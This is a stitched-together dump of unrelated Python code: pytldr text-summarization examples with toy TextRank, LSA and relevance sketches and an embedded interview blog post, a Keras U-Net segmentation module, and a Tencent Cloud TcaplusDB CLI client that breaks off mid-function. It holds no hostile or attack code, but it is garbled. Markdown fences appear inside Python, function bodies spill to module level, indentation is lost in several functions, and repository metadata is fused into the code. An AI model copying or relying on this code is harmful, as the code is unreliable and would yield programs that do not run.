    summary = summarizer.summarize("Some long article ...", length=4)
    print(summary)
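# The TextRank idea sketched above can be illustrated without any library:
# build a word-overlap similarity graph over sentences and run the PageRank
# power iteration on it. This is a toy sketch of the technique, not pytldr's
# actual implementation; the normalization follows Mihalcea & Tarau's paper.

```python
import math


def textrank_scores(sentences, damping=0.85, iterations=50):
    """Score sentences by PageRank over a word-overlap similarity graph."""
    words = [set(s.lower().split()) for s in sentences]
    n = len(sentences)
    # Similarity: number of shared words, normalized by log sentence lengths.
    sim = [[0.0] * n for _ in range(n)]
    for i in range(n):
        for j in range(n):
            if i != j and len(words[i]) > 1 and len(words[j]) > 1:
                overlap = len(words[i] & words[j])
                sim[i][j] = overlap / (math.log(len(words[i])) + math.log(len(words[j])))
    # PageRank power iteration: each sentence distributes its score along
    # its outgoing similarity edges, proportionally to edge weight.
    scores = [1.0] * n
    for _ in range(iterations):
        new = []
        for i in range(n):
            rank = sum(
                sim[j][i] / sum(sim[j]) * scores[j]
                for j in range(n) if sum(sim[j]) > 0 and sim[j][i] > 0
            )
            new.append((1 - damping) + damping * rank)
        scores = new
    return scores
```

# A summary would then keep the top-scoring sentences in document order.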
def example_4():
    """
    Latent Semantic Analysis (LSA) summarization.
    Reduces the article to a number of "topic" clusters via singular value
    decomposition and picks the sentences that best match those topics.
    This module ships with two different implementations, following two papers:
    J. Steinberger and K. Jezek (2004). Using latent semantic analysis in text summarization and summary evaluation.
    Ozsoy, M., Alpaslan, F., and Cicekli, I. (2011). Text summarization using latent semantic analysis.
    The more recent one (Ozsoy) is used by default, but they share the same interface.
    """
    from pytldr.summarize.lsa import LsaSummarizer, LsaOzsoy, LsaSteinberger
text = """
Hello! I just finished interviewing with Google and wanted to quickly catch you up on some interesting and frustrating steps of the process so that you can understand what to expect from Google interviews and the steps involved. I will also share some tips on how to prepare for the interview and mistakes to avoid. If you’re looking for a success story, this is the wrong post for you. I actually failed the interviewing process, but the whole experience was pretty interesting for me and leads me on to another stage of my career. I will share more details on this at the end of the post. All names and identifying details have been changed to protect the privacy of Google employees. Initial screening interview. My story starts on a rainy October morning. I received a message from Olivia, a Google recruiter, with the subject «Interested in solving high-impact engineering problems at Google?». At that moment in time I had recently finished several projects and was looking for new challenges. Working at Google seemed like a good opportunity that I didn’t want to miss, so I quickly responded, «Yes, definitely» and booked an appointment via Google Hangouts. Our chat took place two days later via Hangouts. Olivia told me how exciting it is to work at Google, and what the hiring process looks like. When I asked about the details of the position, she told me that they were looking for someone for their new office in Warsaw, Poland, to support and develop Google Cloud functions for enterprise customers. I asked about the exact responsibilities that would come under my remit, and the team I would be part of, but she said it didn’t matter at that stage – I could select the desired team and position later on when all steps of the interview process were completed. That was frustrating moment #1 for me, but I decided that it was worth persevering. Frustrating moment #1. What if there was no team at Google that I would like to join? 
From what Olivia told me, the interviewing process at Google comprises three stages: first of all, there are two remote coding interviews on algo and data structures. If you’re extraordinary, you might just have one interview, but for an average software engineer it will be two. The next stage is an on-site interview in one of the Google offices, which includes several coding interviews (again!), a system design interview, and last but not least, ‘Googleyness and Leadership’. The last one detects how well you’ll fit into the company. Tip #1. The Google interviewing process is difficult and will take up several weeks of your life. You need to go all-in to prepare for it.
"""
summarizer = LsaOzsoy()
summarizer = LsaSteinberger()
summarizer = LsaSummarizer() # This is identical to the LsaOzsoy object
summary = summarizer.summarize(
text, topics=4, length=5, binary_matrix=True, topic_sigma_threshold=0.5
)
print(summary)
# topics specifies the number of topics to cluster the article into.
# topic_sigma_threshold removes all topics with a singular value less than a given
# percentage of the largest singular value.
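# The LSA selection step can be sketched in plain Python: build a binary
# term-by-sentence matrix, extract the dominant "topic" (top singular vector)
# with power iteration, and pick the sentence with the largest loading on it.
# Illustrative only, not pytldr's implementation, and it keeps a single topic
# rather than the several that the real summarizers use.

```python
def top_sentence_lsa(sentences, iterations=100):
    """Return the index of the sentence loading most on the dominant topic."""
    sent_words = [set(s.lower().split()) for s in sentences]
    vocab = sorted({w for ws in sent_words for w in ws})
    # Binary term x sentence matrix A (rows: terms, cols: sentences).
    a = [[1.0 if term in sent_words[j] else 0.0 for j in range(len(sentences))]
         for term in vocab]
    # Power iteration on A^T A converges to the top right singular vector v;
    # v[j] measures how strongly sentence j expresses the dominant topic.
    v = [1.0] * len(sentences)
    for _ in range(iterations):
        u = [sum(row[j] * v[j] for j in range(len(v))) for row in a]       # u = A v
        v = [sum(a[i][j] * u[i] for i in range(len(a))) for j in range(len(v))]  # v = A^T u
        norm = sum(x * x for x in v) ** 0.5
        v = [x / norm for x in v]
    return max(range(len(sentences)), key=lambda j: abs(v[j]))
```

# The Steinberger/Ozsoy variants differ mainly in how loadings across several
# topics are weighted and combined.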
def example_5():
    """
    Relevance-score summarization.
    Computes and ranks sentences by the cosine similarity between each
    sentence vector and the whole document, removing the most relevant
    sentence on each iteration.
    This approach is closely described in:
    Y. Gong and X. Liu (2001). Generic text summarization using relevance measure and latent semantic analysis.
    """
    from pytldr.summarize.relevance import RelevanceSummarizer
text = """
Hello! I just finished interviewing with Google and wanted to quickly catch you up on some interesting and frustrating steps of the process so that you can understand what to expect from Google interviews and the steps involved. I will also share some tips on how to prepare for the interview and mistakes to avoid. If you’re looking for a success story, this is the wrong post for you. I actually failed the interviewing process, but the whole experience was pretty interesting for me and leads me on to another stage of my career. I will share more details on this at the end of the post. All names and identifying details have been changed to protect the privacy of Google employees. Initial screening interview. My story starts on a rainy October morning. I received a message from Olivia, a Google recruiter, with the subject «Interested in solving high-impact engineering problems at Google?». At that moment in time I had recently finished several projects and was looking for new challenges. Working at Google seemed like a good opportunity that I didn’t want to miss, so I quickly responded, «Yes, definitely» and booked an appointment via Google Hangouts. Our chat took place two days later via Hangouts. Olivia told me how exciting it is to work at Google, and what the hiring process looks like. When I asked about the details of the position, she told me that they were looking for someone for their new office in Warsaw, Poland, to support and develop Google Cloud functions for enterprise customers. I asked about the exact responsibilities that would come under my remit, and the team I would be part of, but she said it didn’t matter at that stage – I could select the desired team and position later on when all steps of the interview process were completed. That was frustrating moment #1 for me, but I decided that it was worth persevering. Frustrating moment #1. What if there was no team at Google that I would like to join? 
From what Olivia told me, the interviewing process at Google comprises three stages: first of all, there are two remote coding interviews on algo and data structures. If you’re extraordinary, you might just have one interview, but for an average software engineer it will be two. The next stage is an on-site interview in one of the Google offices, which includes several coding interviews (again!), a system design interview, and last but not least, ‘Googleyness and Leadership’. The last one detects how well you’ll fit into the company. Tip #1. The Google interviewing process is difficult and will take up several weeks of your life. You need to go all-in to prepare for it.
"""
summarizer = RelevanceSummarizer()
summary = summarizer.summarize(text, length=5, binary_matrix=True)
print(summary)
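# The core operation of the relevance method is a cosine similarity between a
# bag-of-words sentence vector and the document vector. A minimal sketch of
# that measure (not pytldr's code, which also supports TF-IDF weighting):

```python
def cosine_relevance(sentence, document):
    """Cosine similarity between bag-of-words vectors of two texts."""
    def bag(text):
        counts = {}
        for w in text.lower().split():
            counts[w] = counts.get(w, 0) + 1
        return counts
    s, d = bag(sentence), bag(document)
    dot = sum(s[w] * d.get(w, 0) for w in s)
    norm_s = sum(c * c for c in s.values()) ** 0.5
    norm_d = sum(c * c for c in d.values()) ** 0.5
    return dot / (norm_s * norm_d) if norm_s and norm_d else 0.0
```

# The summarizer would repeatedly pick the sentence with the highest such
# score against the remaining document, then remove it and iterate.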
if __name__ == '__main__':
    # Don't forget about:
    #   help(TextRankSummarizer)
    #   help(LsaSummarizer)
    #   help(RelevanceSummarizer)
    # example_1()
    # example_2()
    # example_3()
    # example_4()
    example_5()
69d22958c82c29c910af12a2b71fe4b6e34aaba3 | 12,673 | py | Python | python/photographic_mc_U_Net/MyUnet.py | billy000400/Mu2e_MLTracking | 675e62d844ff8a5ccba9019e316c374c40658101 | [
"MIT"
] | null | null | null | python/photographic_mc_U_Net/MyUnet.py | billy000400/Mu2e_MLTracking | 675e62d844ff8a5ccba9019e316c374c40658101 | [
"MIT"
] | 1 | 2021-01-03T08:57:34.000Z | 2021-01-03T23:41:22.000Z | python/photographic_mc_U_Net/MyUnet.py | billy000400/Mu2e_MLTracking | 675e62d844ff8a5ccba9019e316c374c40658101 | [
"MIT"
] | null | null | null | ## A U-Net architecture for semantic image segmentation.
#
# No dense block is applied. Skip connections merge feature maps with
# "concatenate" instead of "add."
# The padding strategy is "same" instead of "valid."
# Conv2DTranspose is used instead of UpSampling2D.
from tensorflow import keras
from tensorflow.keras import Model, initializers
from tensorflow.keras.layers import *
class U_Net:
    """A four-level U-Net (four 2x2 poolings, 1024-filter bottleneck)."""

    def __init__(self, input_shape, num_class, shrink_times=3):
        if len(input_shape) == 2:
            # Add a single-channel axis for grayscale input.
            self.input_shape = tuple(input_shape) + (1,)
        elif len(input_shape) == 3:
            self.input_shape = input_shape
        else:
            raise ValueError("Invalid input shape: expected (H, W) or (H, W, C)")
        self.num_class = num_class
        self.shrink_times = shrink_times

    @staticmethod
    def _conv_block(x, filters, init):
        # Two (3x3 Conv2D -> BatchNorm -> ReLU) layers, as in the original
        # unrolled code.
        for _ in range(2):
            x = Conv2D(filters, 3, padding='same', kernel_initializer=init)(x)
            x = BatchNormalization()(x)
            x = Activation('relu')(x)
        return x

    @staticmethod
    def _up_block(x, skip, filters, init):
        # A stride-2 transposed convolution doubles the spatial size; the
        # result is concatenated with the matching encoder feature map.
        x = Conv2DTranspose(filters, kernel_size=(2, 2), strides=(2, 2),
                            padding='valid', kernel_initializer=init)(x)
        x = BatchNormalization()(x)
        x = Activation('relu')(x)
        return concatenate([x, skip], axis=3)

    def get_model(self):
        init = initializers.RandomNormal(stddev=0.01)
        inputs = Input(self.input_shape)
        # Encoder: four levels of conv blocks and 2x2 max-pooling.
        conv1 = self._conv_block(inputs, 64, init)
        pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
        conv2 = self._conv_block(pool1, 128, init)
        pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
        conv3 = self._conv_block(pool2, 256, init)
        pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
        conv4 = self._conv_block(pool3, 512, init)
        pool4 = MaxPooling2D(pool_size=(2, 2))(conv4)
        # Bottleneck.
        conv5 = self._conv_block(pool4, 1024, init)
        # Decoder: upsample and merge with the encoder skip connections.
        conv6 = self._conv_block(self._up_block(conv5, conv4, 512, init), 512, init)
        conv7 = self._conv_block(self._up_block(conv6, conv3, 256, init), 256, init)
        conv8 = self._conv_block(self._up_block(conv7, conv2, 128, init), 128, init)
        conv9 = self._conv_block(self._up_block(conv8, conv1, 64, init), 64, init)
        # Per-pixel softmax over the classes.
        output = Conv2D(self.num_class, 1, activation='softmax',
                        padding='same', kernel_initializer=init)(conv9)
        return Model(inputs, output)
class U_Net_3:
    """A shallower U-Net with two 2x2 poolings and a 256-filter bottleneck."""

    def __init__(self, input_shape, num_class, shrink_times=3):
        if len(input_shape) == 2:
            # Add a single-channel axis for grayscale input.
            self.input_shape = tuple(input_shape) + (1,)
        elif len(input_shape) == 3:
            self.input_shape = input_shape
        else:
            raise ValueError("Invalid input shape: expected (H, W) or (H, W, C)")
        self.num_class = num_class
        self.shrink_times = shrink_times

    @staticmethod
    def _conv_block(x, filters, init):
        # Two (3x3 Conv2D -> BatchNorm -> ReLU) layers.
        for _ in range(2):
            x = Conv2D(filters, 3, padding='same', kernel_initializer=init)(x)
            x = BatchNormalization()(x)
            x = Activation('relu')(x)
        return x

    @staticmethod
    def _up_block(x, skip, filters, init):
        # Stride-2 transposed convolution, then concatenate the skip features.
        x = Conv2DTranspose(filters, kernel_size=(2, 2), strides=(2, 2),
                            padding='valid', kernel_initializer=init)(x)
        x = BatchNormalization()(x)
        x = Activation('relu')(x)
        return concatenate([x, skip], axis=3)

    def get_model(self):
        init = initializers.RandomNormal(stddev=0.01)
        inputs = Input(self.input_shape)
        # Encoder.
        conv1 = self._conv_block(inputs, 64, init)
        pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
        conv2 = self._conv_block(pool1, 128, init)
        pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
        # Bottleneck.
        conv3 = self._conv_block(pool2, 256, init)
        # Decoder with skip connections.
        conv4 = self._conv_block(self._up_block(conv3, conv2, 128, init), 128, init)
        conv5 = self._conv_block(self._up_block(conv4, conv1, 64, init), 64, init)
        output = Conv2D(self.num_class, 1, activation='softmax',
                        padding='same', kernel_initializer=init)(conv5)
        return Model(inputs, output)
class U_Net_4:
    """A U-Net with three 2x2 poolings and a 512-filter bottleneck."""

    def __init__(self, input_shape, num_class, shrink_times=3):
        if len(input_shape) == 2:
            # Add a single-channel axis for grayscale input.
            self.input_shape = tuple(input_shape) + (1,)
        elif len(input_shape) == 3:
            self.input_shape = input_shape
        else:
            raise ValueError("Invalid input shape: expected (H, W) or (H, W, C)")
        self.num_class = num_class
        self.shrink_times = shrink_times

    @staticmethod
    def _conv_block(x, filters, init):
        # Two (3x3 Conv2D -> BatchNorm -> ReLU) layers.
        for _ in range(2):
            x = Conv2D(filters, 3, padding='same', kernel_initializer=init)(x)
            x = BatchNormalization()(x)
            x = Activation('relu')(x)
        return x

    @staticmethod
    def _up_block(x, skip, filters, init):
        # Stride-2 transposed convolution, then concatenate the skip features.
        x = Conv2DTranspose(filters, kernel_size=(2, 2), strides=(2, 2),
                            padding='valid', kernel_initializer=init)(x)
        x = BatchNormalization()(x)
        x = Activation('relu')(x)
        return concatenate([x, skip], axis=3)

    def get_model(self):
        init = initializers.RandomNormal(stddev=0.01)
        inputs = Input(self.input_shape)
        # Encoder.
        conv1 = self._conv_block(inputs, 64, init)
        pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
        conv2 = self._conv_block(pool1, 128, init)
        pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
        conv3 = self._conv_block(pool2, 256, init)
        pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
        # Bottleneck.
        conv4 = self._conv_block(pool3, 512, init)
        # Decoder with skip connections.
        conv5 = self._conv_block(self._up_block(conv4, conv3, 256, init), 256, init)
        conv6 = self._conv_block(self._up_block(conv5, conv2, 128, init), 128, init)
        # Note: the final decoder block keeps 128 filters, as in the original code.
        conv7 = self._conv_block(self._up_block(conv6, conv1, 64, init), 128, init)
        output = Conv2D(self.num_class, 1, activation='softmax',
                        padding='same', kernel_initializer=init)(conv7)
        return Model(inputs, output)
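# With 'same'-padded convolutions, each 2x2 max-pool halves the spatial size
# (floor division), and each stride-2 transposed convolution doubles it. The
# skip concatenations above only line up if the input height/width survive
# that round trip, i.e. are divisible by 2**depth. A quick sanity check,
# assuming exactly this pooling/upsampling arithmetic:

```python
def unet_shape_ok(height, width, depth):
    """True if (height, width) survive `depth` pool/upsample round trips."""
    h, w = height, width
    for _ in range(depth):
        h, w = h // 2, w // 2    # MaxPooling2D(pool_size=(2, 2))
    for _ in range(depth):
        h, w = h * 2, w * 2      # Conv2DTranspose(strides=(2, 2))
    return (h, w) == (height, width)
```

# E.g. U_Net (depth 4) needs dimensions divisible by 16, U_Net_4 (depth 3)
# by 8, and U_Net_3 (depth 2) by 4.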
# tccli/services/tcaplusdb/tcaplusdb_client.py from hapsyou/tencentcloud-cli-intl-en (Apache-2.0 license)
# -*- coding: utf-8 -*-
import os
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli.nice_command import NiceCommand
import tccli.error_msg as ErrorMsg
import tccli.help_template as HelpTemplate
from tccli import __version__
from tccli.utils import Utils
from tccli.configure import Configure
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.tcaplusdb.v20190823 import tcaplusdb_client as tcaplusdb_client_v20190823
from tencentcloud.tcaplusdb.v20190823 import models as models_v20190823
from tccli.services.tcaplusdb import v20190823
from tccli.services.tcaplusdb.v20190823 import help as v20190823_help
def doDescribeTableTags(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeTableTags", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTableTagsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeTableTags(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTableTags(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyTableTags", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
"ReplaceTags": Utils.try_to_json(argv, "--ReplaceTags"),
"DeleteTags": Utils.try_to_json(argv, "--DeleteTags"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyTableTagsRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyTableTags(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateCluster(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("CreateCluster", g_param[OptionsDefine.Version])
return
param = {
"IdlType": argv.get("--IdlType"),
"ClusterName": argv.get("--ClusterName"),
"VpcId": argv.get("--VpcId"),
"SubnetId": argv.get("--SubnetId"),
"Password": argv.get("--Password"),
"ResourceTags": Utils.try_to_json(argv, "--ResourceTags"),
"Ipv6Enable": Utils.try_to_json(argv, "--Ipv6Enable"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateClusterRequest()
model.from_json_string(json.dumps(param))
rsp = client.CreateCluster(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeUinInWhitelist(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeUinInWhitelist", g_param[OptionsDefine.Version])
return
param = {
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeUinInWhitelistRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeUinInWhitelist(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTablesInRecycle(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeTablesInRecycle", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"TableGroupIds": Utils.try_to_json(argv, "--TableGroupIds"),
"Filters": Utils.try_to_json(argv, "--Filters"),
"Offset": Utils.try_to_json(argv, "--Offset"),
"Limit": Utils.try_to_json(argv, "--Limit"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTablesInRecycleRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeTablesInRecycle(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doRollbackTables(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("RollbackTables", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
"RollbackTime": argv.get("--RollbackTime"),
"Mode": argv.get("--Mode"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.RollbackTablesRequest()
model.from_json_string(json.dumps(param))
rsp = client.RollbackTables(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyClusterName(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyClusterName", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"ClusterName": argv.get("--ClusterName"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyClusterNameRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyClusterName(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDeleteCluster(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DeleteCluster", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DeleteClusterRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DeleteCluster(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doModifyClusterPassword(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("ModifyClusterPassword", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "OldPassword": argv.get("--OldPassword"),
        "OldPasswordExpireTime": argv.get("--OldPasswordExpireTime"),
        "NewPassword": argv.get("--NewPassword"),
        "Mode": argv.get("--Mode"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ModifyClusterPasswordRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.ModifyClusterPassword(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDeleteIdlFiles(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DeleteIdlFiles", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "IdlFiles": Utils.try_to_json(argv, "--IdlFiles"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DeleteIdlFilesRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DeleteIdlFiles(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doRecoverRecycleTables(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("RecoverRecycleTables", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.RecoverRecycleTablesRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.RecoverRecycleTables(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doCreateBackup(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
